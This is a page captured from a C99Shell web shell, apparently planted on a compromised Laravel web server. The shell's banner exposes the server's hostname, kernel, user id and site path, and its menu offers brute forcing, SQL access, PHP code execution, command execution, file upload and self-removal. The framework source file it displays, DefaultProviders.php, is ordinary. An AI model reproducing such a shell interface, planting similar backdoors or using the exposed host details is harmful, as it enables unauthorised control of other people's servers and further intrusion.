!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gwp.picotech.app/public_html/vendor/laravel/framework/src/Illuminate/Support/   drwxr-xr-x
Free 28.61 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     DefaultProviders.php (3.12 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Support;

class 
DefaultProviders
{
    
/**
     * The current providers.
     *
     * @var array
     */
    
protected $providers;

    
/**
     * Create a new default provider collection.
     */
    
public function __construct(?array $providers null)
    {
        
$this->providers $providers ?: [
            
\Illuminate\Auth\AuthServiceProvider::class,
            
\Illuminate\Broadcasting\BroadcastServiceProvider::class,
            
\Illuminate\Bus\BusServiceProvider::class,
            
\Illuminate\Cache\CacheServiceProvider::class,
            
\Illuminate\Foundation\Providers\ConsoleSupportServiceProvider::class,
            
\Illuminate\Concurrency\ConcurrencyServiceProvider::class,
            
\Illuminate\Cookie\CookieServiceProvider::class,
            
\Illuminate\Database\DatabaseServiceProvider::class,
            
\Illuminate\Encryption\EncryptionServiceProvider::class,
            
\Illuminate\Filesystem\FilesystemServiceProvider::class,
            
\Illuminate\Foundation\Providers\FoundationServiceProvider::class,
            
\Illuminate\Hashing\HashServiceProvider::class,
            
\Illuminate\Mail\MailServiceProvider::class,
            
\Illuminate\Notifications\NotificationServiceProvider::class,
            
\Illuminate\Pagination\PaginationServiceProvider::class,
            
\Illuminate\Auth\Passwords\PasswordResetServiceProvider::class,
            
\Illuminate\Pipeline\PipelineServiceProvider::class,
            
\Illuminate\Queue\QueueServiceProvider::class,
            
\Illuminate\Redis\RedisServiceProvider::class,
            
\Illuminate\Session\SessionServiceProvider::class,
            
\Illuminate\Translation\TranslationServiceProvider::class,
            
\Illuminate\Validation\ValidationServiceProvider::class,
            
\Illuminate\View\ViewServiceProvider::class,
        ];
    }

    
/**
     * Merge the given providers into the provider collection.
     *
     * @param  array  $providers
     * @return static
     */
    
public function merge(array $providers)
    {
        
$this->providers array_merge($this->providers$providers);

        return new static(
$this->providers);
    }

    
/**
     * Replace the given providers with other providers.
     *
     * @param  array  $replacements
     * @return static
     */
    
public function replace(array $replacements)
    {
        
$current = new Collection($this->providers);

        foreach (
$replacements as $from => $to) {
            
$key $current->search($from);

            
$current is_int($key) ? $current->replace([$key => $to]) : $current;
        }

        return new static(
$current->values()->toArray());
    }

    
/**
     * Disable the given providers.
     *
     * @param  array  $providers
     * @return static
     */
    
public function except(array $providers)
    {
        return new static((new 
Collection($this->providers))
            ->
reject(fn ($p) => in_array($p$providers))
            ->
values()
            ->
toArray());
    }

    
/**
     * Convert the provider collection to an array.
     *
     * @return array
     */
    
public function toArray()
    {
        return 
$this->providers;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--